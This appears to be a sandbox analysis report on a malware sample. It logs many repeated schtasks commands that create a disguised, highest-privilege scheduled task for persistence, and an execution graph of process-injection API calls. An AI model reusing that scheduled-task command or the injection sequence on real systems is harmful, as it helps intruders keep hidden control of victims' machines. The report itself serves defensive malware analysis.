                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:14
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:15
                Start time:11:37:01
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:16
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x7ff75da10000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:17
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:18
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:19
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:20
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:21
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:22
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:23
                Start time:11:37:02
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:24
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:25
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:26
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:27
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:28
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:29
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:30
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:31
                Start time:11:37:03
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:32
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:33
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:34
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:35
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:36
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:37
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:38
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:39
                Start time:11:37:04
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:41
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:42
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:43
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:54 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:45
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:48
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:49
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:50
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:51
                Start time:11:37:05
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:55
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:56
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:58
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:59
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:60
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:61
                Start time:11:37:06
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:62
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:63
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:64
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:65
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:66
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:67
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:68
                Start time:11:37:07
                Start date:19/04/2024
                Path:C:\Windows\SysWOW64\schtasks.exe
                Wow64 process (32bit):true
                Commandline:"SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
                Imagebase:0x830000
                File size:187'904 bytes
                MD5 hash:48C2FE20575769DE916F48EF0676A965
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:69
                Start time:11:37:08
                Start date:19/04/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff75da10000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:17.1%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:75.8%
                  Total number of Nodes:33
                  Total number of Limit Nodes:0
                  execution_graph 5953 2795c38 5954 2795c52 5953->5954 5957 2795cb8 5954->5957 5958 2795cfb 5957->5958 5984 2796e00 5958->5984 5988 2796df7 5958->5988 5959 27963d4 5960 27964ea 5959->5960 5967 27971db Wow64SetThreadContext 5959->5967 5968 27971e0 Wow64SetThreadContext 5959->5968 5975 2797539 VirtualAllocEx 5960->5975 5976 27975ec VirtualAllocEx ResumeThread 5960->5976 5977 2797540 VirtualAllocEx 5960->5977 5961 2796743 5969 2797398 WriteProcessMemory 5961->5969 5970 2797390 WriteProcessMemory 5961->5970 5962 2796ad8 5980 2797398 WriteProcessMemory 5962->5980 5981 2797390 WriteProcessMemory 5962->5981 5963 2796845 5963->5962 5978 2797398 WriteProcessMemory 5963->5978 5979 2797390 WriteProcessMemory 5963->5979 5964 2796b2a 5965 2796c3e 5964->5965 5982 27971db Wow64SetThreadContext 5964->5982 5983 27971e0 Wow64SetThreadContext 5964->5983 5971 27975ec VirtualAllocEx ResumeThread 5965->5971 5972 2797a00 ResumeThread 5965->5972 5966 2795c86 5967->5960 5968->5960 5969->5963 5970->5963 5971->5966 5972->5966 5975->5961 5976->5961 5977->5961 5978->5963 5979->5963 5980->5964 5981->5964 5982->5965 5983->5965 5985 2796e86 CreateProcessA 5984->5985 5987 279709f 5985->5987 5989 2796e86 CreateProcessA 5988->5989 5991 279709f 5989->5991

                  Executed Functions

                  Function 02795CB8 Relevance: .9, Instructions: 925COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 02760e43a74798f8937b76e1e2d25ba2e1e8444155bfae6c9b122f921260a624
                  • Instruction ID: df70ef09d953d49ae3f985e8f5d28b44c4bae44bfdf30ad5a3a9c1a1b838898f
                  • Opcode Fuzzy Hash: 02760e43a74798f8937b76e1e2d25ba2e1e8444155bfae6c9b122f921260a624
                  • Instruction Fuzzy Hash: 0DA2E274E012289FDB64DF68D894BEDBBB6BF89300F1481EAD409A7290DB355E85CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02794720 Relevance: .4, Instructions: 390COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18443ced7ec41f7d2797c5dea5bfb033ee076e26604d516eb243eed5beaef60e
                  • Instruction ID: d560944e7656970fdf863cc6685995f8fe5775bca3faff5793ba84feb8c2794c
                  • Opcode Fuzzy Hash: 18443ced7ec41f7d2797c5dea5bfb033ee076e26604d516eb243eed5beaef60e
                  • Instruction Fuzzy Hash: C4F11A74E003198FDF58DFA8D890BADBBF6AF88310F1481A9D909A7395DA349E41CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 027975EC Relevance: 3.6, APIs: 2, Instructions: 586memorythreadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 027975AE
                  • ResumeThread.KERNEL32(?), ref: 02797A62
                  Memory Dump Source
                  • Source File: 00000000.00000002.1314539230.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2790000_EGSh5caf8a.jbxd
                  Similarity
                  • API ID: AllocResumeThreadVirtual
                  • String ID:
                  • API String ID: 234695336-0
                  • Opcode ID: 2f3dfed73d7c0a5fce185151440a03b5f03f8e8d9905e40807fc40fadfbcf2b9
                  • Instruction ID: 3ca258c92d8f0c9a8b24aa0107ddcabaa7d7a63f39aa87ee84a269befb048a49
                  • Opcode Fuzzy Hash: 2f3dfed73d7c0a5fce185151440a03b5f03f8e8d9905e40807fc40fadfbcf2b9
                  • Instruction Fuzzy Hash: 3331EBB2C043888FDB21DFA9D8443DEFFF0EF45324F15849AC098AB291DA345949CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02796DF7 Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
